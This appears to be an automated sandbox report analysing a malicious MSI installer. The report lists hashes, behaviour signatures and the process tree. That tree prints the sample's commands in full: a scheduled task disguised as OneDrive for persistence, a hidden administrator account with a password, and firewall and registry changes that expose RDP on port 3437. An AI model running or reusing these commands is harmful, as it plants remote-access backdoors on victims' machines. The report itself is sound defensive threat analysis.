Analysis
max time kernel: 109s
max time network: 109s
platform: windows7_x64
resource: win7-en-20211208
submitted: 21-12-2021 17:47
Static task: static1
Behavioral task: behavioral1
    Sample: seucartao0021 bdpk7zuq ju1ej9.msi
    Resource: win7-en-20211208
Behavioral task: behavioral2
    Sample: seucartao0021 bdpk7zuq ju1ej9.msi
    Resource: win10-en-20211208
General
Target: seucartao0021 bdpk7zuq ju1ej9.msi
Size: 4.0MB
MD5: 8a53e2cb70a3967f721059d146e7ac4c
SHA1: 429614ea9a6067160470aa5e101bb33b862deb80
SHA256: 7e7d377140a146065c91c271e97dff7bb94f4b42245f1fba4dd2899271281912
SHA512: 5ce3076109b4220de0e996eb91addeefeb9c0c9a19b0434b9858c18b69c88151ac8478402ad13efe6c791bb0771dcfec4f7fcc231cb199f7c334fb9c550d6e5d
Malware Config
Signatures
Blocklisted process makes network request (2 IoCs)
flow  pid  Process
3     988  MsiExec.exe
4     988  MsiExec.exe

Executes dropped EXE (2 IoCs)
pid   Process
612   HhsVSyqBnmZk.exe
1208  IVJLAJRj.exe

Modifies RDP port number used by Windows (1 TTPs)

Modifies Windows Firewall (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Drops startup file (1 IoCs)
description   ioc                                                                                              Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxMsvCUwKRRB.lnk  MsiExec.exe

Loads dropped DLL (23 IoCs)
pid   Process
988   MsiExec.exe
988   MsiExec.exe
988   MsiExec.exe
988   MsiExec.exe
988   MsiExec.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
612   HhsVSyqBnmZk.exe
1208  IVJLAJRj.exe
1208  IVJLAJRj.exe
1208  IVJLAJRj.exe
1208  IVJLAJRj.exe
1208  IVJLAJRj.exe
1208  IVJLAJRj.exe
1020  Process not Found
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe
File opened (read-only)  \??\F:  msiexec.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\Q:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\N:  msiexec.exe
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\F:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\N:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\Q:  msiexec.exe
Modifies WinLogon (2 TTPs, 1 IoCs)
description      ioc                                                                                                          Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"  IVJLAJRj.exe

Drops file in Program Files directory (2 IoCs)
description   ioc                                                     Process
File created  C:\Program Files\Terminal Service 21122021\rdpwrap.dll  IVJLAJRj.exe
File created  C:\Program Files\Terminal Service 21122021\rdpwrap.ini  IVJLAJRj.exe

Drops file in Windows directory (10 IoCs)
description                   ioc                                 Process
File created                  C:\Windows\Installer\f75b7ea.msi    msiexec.exe
File opened for modification  C:\Windows\Installer\f75b7ea.msi    msiexec.exe
File opened for modification  C:\Windows\Installer\MSIBA6A.tmp    msiexec.exe
File opened for modification  C:\Windows\Installer\MSIBB27.tmp    msiexec.exe
File opened for modification  C:\Windows\Installer\MSI145E.tmp    msiexec.exe
File opened for modification  C:\Windows\Installer\MSIB8B5.tmp    msiexec.exe
File created                  C:\Windows\Installer\f75b7ec.ipi    msiexec.exe
File opened for modification  C:\Windows\Installer\               msiexec.exe
File opened for modification  C:\Windows\Installer\f75b7ec.ipi    msiexec.exe
File opened for modification  C:\Windows\Installer\MSI1626.tmp    msiexec.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
580  schtasks.exe

Runs net.exe

Script User-Agent (3 IoCs)
Uses user-agent string associated with script host/environment.
description            flow  ioc
HTTP User-Agent header  4    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  6    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  3    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid  Process
268  msiexec.exe
268  msiexec.exe
612  HhsVSyqBnmZk.exe

Suspicious behavior: LoadsDriver (1 IoCs)
pid   Process
1020  Process not Found
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description                            pid   Process
Token: SeShutdownPrivilege             1776  msiexec.exe
Token: SeIncreaseQuotaPrivilege        1776  msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeSecurityPrivilege             268   msiexec.exe
Token: SeCreateTokenPrivilege          1776  msiexec.exe
Token: SeAssignPrimaryTokenPrivilege   1776  msiexec.exe
Token: SeLockMemoryPrivilege           1776  msiexec.exe
Token: SeIncreaseQuotaPrivilege        1776  msiexec.exe
Token: SeMachineAccountPrivilege       1776  msiexec.exe
Token: SeTcbPrivilege                  1776  msiexec.exe
Token: SeSecurityPrivilege             1776  msiexec.exe
Token: SeTakeOwnershipPrivilege        1776  msiexec.exe
Token: SeLoadDriverPrivilege           1776  msiexec.exe
Token: SeSystemProfilePrivilege        1776  msiexec.exe
Token: SeSystemtimePrivilege           1776  msiexec.exe
Token: SeProfSingleProcessPrivilege    1776  msiexec.exe
Token: SeIncBasePriorityPrivilege      1776  msiexec.exe
Token: SeCreatePagefilePrivilege       1776  msiexec.exe
Token: SeCreatePermanentPrivilege      1776  msiexec.exe
Token: SeBackupPrivilege               1776  msiexec.exe
Token: SeRestorePrivilege              1776  msiexec.exe
Token: SeShutdownPrivilege             1776  msiexec.exe
Token: SeDebugPrivilege                1776  msiexec.exe
Token: SeAuditPrivilege                1776  msiexec.exe
Token: SeSystemEnvironmentPrivilege    1776  msiexec.exe
Token: SeChangeNotifyPrivilege         1776  msiexec.exe
Token: SeRemoteShutdownPrivilege       1776  msiexec.exe
Token: SeUndockPrivilege               1776  msiexec.exe
Token: SeSyncAgentPrivilege            1776  msiexec.exe
Token: SeEnableDelegationPrivilege     1776  msiexec.exe
Token: SeManageVolumePrivilege         1776  msiexec.exe
Token: SeImpersonatePrivilege          1776  msiexec.exe
Token: SeCreateGlobalPrivilege         1776  msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeRestorePrivilege              268   msiexec.exe
Token: SeTakeOwnershipPrivilege        268   msiexec.exe
Token: SeIncreaseQuotaPrivilege        1400  WMIC.exe
Token: SeSecurityPrivilege             1400  WMIC.exe
Token: SeTakeOwnershipPrivilege        1400  WMIC.exe
Token: SeLoadDriverPrivilege           1400  WMIC.exe
Token: SeSystemProfilePrivilege        1400  WMIC.exe
Token: SeSystemtimePrivilege           1400  WMIC.exe
Token: SeProfSingleProcessPrivilege    1400  WMIC.exe
Token: SeIncBasePriorityPrivilege      1400  WMIC.exe
Token: SeCreatePagefilePrivilege       1400  WMIC.exe
Token: SeBackupPrivilege               1400  WMIC.exe
Token: SeRestorePrivilege              1400  WMIC.exe
Token: SeShutdownPrivilege             1400  WMIC.exe
Token: SeDebugPrivilege                1400  WMIC.exe
Token: SeSystemEnvironmentPrivilege    1400  WMIC.exe
Token: SeRemoteShutdownPrivilege       1400  WMIC.exe
Token: SeUndockPrivilege               1400  WMIC.exe
Token: SeManageVolumePrivilege         1400  WMIC.exe
Token: 33                              1400  WMIC.exe
Token: 34                              1400  WMIC.exe
Token: 35                              1400  WMIC.exe
Suspicious use of FindShellTrayWindow (3 IoCs)
pid   Process
1776  msiexec.exe
988   MsiExec.exe
1776  msiexec.exe

Suspicious use of WriteProcessMemory (53 IoCs)
description                        pid   Process           procid_target
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 268 wrote to memory of 988     268   msiexec.exe       28
PID 988 wrote to memory of 1400    988   MsiExec.exe       29
PID 988 wrote to memory of 1400    988   MsiExec.exe       29
PID 988 wrote to memory of 1400    988   MsiExec.exe       29
PID 988 wrote to memory of 1400    988   MsiExec.exe       29
PID 612 wrote to memory of 1584    612   HhsVSyqBnmZk.exe  33
PID 612 wrote to memory of 1584    612   HhsVSyqBnmZk.exe  33
PID 612 wrote to memory of 1584    612   HhsVSyqBnmZk.exe  33
PID 612 wrote to memory of 1584    612   HhsVSyqBnmZk.exe  33
PID 1584 wrote to memory of 580    1584  cmd.exe           35
PID 1584 wrote to memory of 580    1584  cmd.exe           35
PID 1584 wrote to memory of 580    1584  cmd.exe           35
PID 1584 wrote to memory of 580    1584  cmd.exe           35
PID 612 wrote to memory of 1208    612   HhsVSyqBnmZk.exe  36
PID 612 wrote to memory of 1208    612   HhsVSyqBnmZk.exe  36
PID 612 wrote to memory of 1208    612   HhsVSyqBnmZk.exe  36
PID 612 wrote to memory of 1208    612   HhsVSyqBnmZk.exe  36
PID 1208 wrote to memory of 1508   1208  IVJLAJRj.exe      40
PID 1208 wrote to memory of 1508   1208  IVJLAJRj.exe      40
PID 1208 wrote to memory of 1508   1208  IVJLAJRj.exe      40
PID 1208 wrote to memory of 1508   1208  IVJLAJRj.exe      40
PID 1208 wrote to memory of 1756   1208  IVJLAJRj.exe      42
PID 1208 wrote to memory of 1756   1208  IVJLAJRj.exe      42
PID 1208 wrote to memory of 1756   1208  IVJLAJRj.exe      42
PID 1208 wrote to memory of 1756   1208  IVJLAJRj.exe      42
PID 1208 wrote to memory of 1556   1208  IVJLAJRj.exe      44
PID 1208 wrote to memory of 1556   1208  IVJLAJRj.exe      44
PID 1208 wrote to memory of 1556   1208  IVJLAJRj.exe      44
PID 1208 wrote to memory of 1556   1208  IVJLAJRj.exe      44
PID 1556 wrote to memory of 1468   1556  net.exe           46
PID 1556 wrote to memory of 1468   1556  net.exe           46
PID 1556 wrote to memory of 1468   1556  net.exe           46
PID 1208 wrote to memory of 876    1208  IVJLAJRj.exe      47
PID 1208 wrote to memory of 876    1208  IVJLAJRj.exe      47
PID 1208 wrote to memory of 876    1208  IVJLAJRj.exe      47
PID 1208 wrote to memory of 876    1208  IVJLAJRj.exe      47
PID 876 wrote to memory of 540     876   net.exe           49
PID 876 wrote to memory of 540     876   net.exe           49
PID 876 wrote to memory of 540     876   net.exe           49
PID 1208 wrote to memory of 1864   1208  IVJLAJRj.exe      50
PID 1208 wrote to memory of 1864   1208  IVJLAJRj.exe      50
PID 1208 wrote to memory of 1864   1208  IVJLAJRj.exe      50
PID 1208 wrote to memory of 1864   1208  IVJLAJRj.exe      50
PID 1208 wrote to memory of 1168   1208  IVJLAJRj.exe      52
PID 1208 wrote to memory of 1168   1208  IVJLAJRj.exe      52
PID 1208 wrote to memory of 1168   1208  IVJLAJRj.exe      52
PID 1208 wrote to memory of 1168   1208  IVJLAJRj.exe      52
Processes
(Indentation shows the process tree depth; each entry lists the image path, the command line, the PID and the signatures triggered by that process.)

C:\Windows\system32\msiexec.exe
    Command line: msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 bdpk7zuq ju1ej9.msi"
    PID: 1776
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe
    Command line: C:\Windows\system32\msiexec.exe /V
    PID: 268
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\syswow64\MsiExec.exe
        Command line: C:\Windows\syswow64\MsiExec.exe -Embedding B6B196D4AD89514D532D520E240EDD86
        PID: 988
        - Blocklisted process makes network request
        - Drops startup file
        - Loads dropped DLL
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\Wbem\WMIC.exe
            Command line: "C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe'
            PID: 1400
            - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe
    Command line: C:\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe
    PID: 612
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe /SC minute /MO 2 /IT /RU %USERNAME%
        PID: 1584
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe
            Command line: schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\lokRfozXIWxY\HhsVSyqBnmZk.exe /SC minute /MO 2 /IT /RU Admin
            PID: 580
            - Creates scheduled task(s)

    C:\Users\Admin\WyFqt 8KJF\IVJLAJRj.exe
        Command line: "C:\Users\Admin\WyFqt 8KJF\IVJLAJRj.exe"
        PID: 1208
        - Executes dropped EXE
        - Loads dropped DLL
        - Modifies WinLogon
        - Drops file in Program Files directory
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3437 profile=any action=allow
            PID: 1508

        C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3437 profile=any action=allow
            PID: 1756

        C:\Windows\system32\net.exe
            Command line: net user Administrat0r "123mudar" /add
            PID: 1556
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 user Administrat0r "123mudar" /add
                PID: 1468

        C:\Windows\system32\net.exe
            Command line: net localgroup Administradores Administrat0r /add
            PID: 876
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 localgroup Administradores Administrat0r /add
                PID: 540

        C:\Windows\system32\netsh.exe
            Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3437 profile=any action=allow
            PID: 1864

        C:\Windows\System32\reg.exe
            Command line: C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3437 /f
            PID: 1168

C:\Windows\system32\LogonUI.exe
    Command line: "LogonUI.exe" /flags:0x0
    PID: 1644

C:\Windows\system32\LogonUI.exe
    Command line: "LogonUI.exe" /flags:0x1
    PID: 1604